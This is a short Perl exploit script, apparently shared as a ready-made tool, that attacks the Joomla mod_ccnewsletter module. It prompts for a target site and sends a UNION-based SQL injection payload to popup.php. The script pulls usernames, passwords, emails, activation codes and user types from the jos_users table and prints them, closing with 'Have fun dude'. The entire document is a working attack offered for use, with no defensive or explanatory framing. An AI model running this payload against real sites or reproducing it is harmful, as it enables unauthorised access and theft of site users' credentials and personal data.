a small xploiter

1. #!/usr/bin/perl -w
2.  
3. use LWP::UserAgent;
4. print "\n[+]===========================================[+]\n";
5. print " |   Simple joomla mod_ccnewsletter exploiter  |\n";
6. print "[+]===========================================[+]\n";
7. print "\n[!] insert ur target [http://target.com/path ] : \n==> ";
8. chomp(my $target=<STDIN>);
9. print "\nScaning target.....\n";
10. print "Sabar wooy.....\n";
11. $sarap="concat(0x5f55,username,0x555f5f50,password,0x505f3a5f45,email,0x455f5f41,activation,0x415f5f54,usertype,0x545f)";
12. $ua = LWP::UserAgent->new() or die "Could not initialize browser\n";
13. $ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)');
14. $sableng = $target . "/modules/mod_ccnewsletter/helper/popup.php?id=-14 UNION ALL SELECT 1,".$sarap.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users#";
15. $mbahmu = $ua->request(HTTP::Request->new(GET=>$sableng));
16. $ndablek = $mbahmu->content;
17.         if ($ndablek =~ m/_U(.*)U_/){
18.         print "\n==> Exploit Sukses.....! ";
19.         print "\n[+] Sitename : $target";
20.         print "\n[+] Username : $1";
21.         }
22.         if ($ndablek =~ m/_P(.*)P_/){
23.         print "\n[+] Password : $1";
24.         }
25.         if ($ndablek =~ m/_E(.*)E_/){
26.         print "\n[+] Email : $1";
27.         }
28.         if ($ndablek =~ m/_T(.*)T_/){
29.         print "\n[+] Usertype : $1";
30.         }
31.         if ($ndablek =~ m/_A(.*)A_/){
32.         print "\n[+] Activation : $1\n";
33. print "\nHave fun dude... ! \n\n";
34.         }
35. else{print "\n==> Exploit Gagal !\n";
36. }